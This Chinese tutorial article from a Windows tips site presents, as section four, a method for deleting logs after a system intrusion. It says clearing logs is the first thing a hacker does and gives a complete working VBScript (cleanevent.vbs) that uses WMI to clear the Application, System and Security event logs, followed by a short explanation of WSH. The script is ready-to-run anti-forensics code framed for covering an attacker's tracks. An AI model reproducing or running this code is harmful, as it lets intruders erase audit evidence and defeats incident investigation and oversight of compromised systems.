时间:2012-10-11 09:56:50 作者:木木 来源:系统之家 1. 扫描二维码随时看资讯 2. 请使用手机浏览器访问: https://m.xitongzhijia.net/xtjc/20121009/17213.html 手机查看 评论 反馈
四、利用脚本编程删除日志
入侵系统成功后黑客做的第一件事便是清除日志,如果以图形界面远程控制对方机器或是从终端登陆进入,删除日志不是一件困难的事,由于日志虽然也是作为一种服务运行,但不同于http,ftp这样的服务,可以在命令行下先停止,再删除,在命令行下用net stop eventlog是不能停止的,所以有人认为在命令行下删除日志是很困难的,实际上不是这样,比方说利用脚本编程中的VMI就可以删除日志,而且非常的简单方便。源代码如下:
1. strComputer= "."
2. Set objWMIService = GetObject("winmgmts:" _
3. & "{impersonationLevel=impersonate,(Backup)}!\\" & _
4. strComputer & "\root\cimv2")
5. dim mylogs(3)
6. mylogs(1)="application"
7. mylogs(2)="system"
8. mylogs(3)="security"
9. for Each logs in mylogs
10. Set colLogFiles=objWMIService.ExecQuery _
11. ("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'")
12. For Each objLogfile in colLogFiles
13. objLogFile.ClearEventLog()
14. Next
15. next
将上面的代码保存为cleanevent.vbs文件即可。在上面的代码中,首先获得object对象,然后利用其clearEventLog() 方法删除日志。建立一个数组,application,security,system,如果还有其他日志也可以加入数组。然后用一个for循环,删除数组中的每一个元素,即各个日志。
VBS代码在本地是通过Windows Script Host(WSH)解释执行的。VBS脚本的执行离不开WSH,WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH,用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。在Windows 2000下,还可用WSH来访问Windows NT活动目录服务。学习了本教程后,这是知识对你来说,统统都是不难理解的吧.
发表评论
共0条
评论就这些咯,让大家也知道你的独特见解
立即评论以上留言仅代表用户个人观点,不代表系统之家立场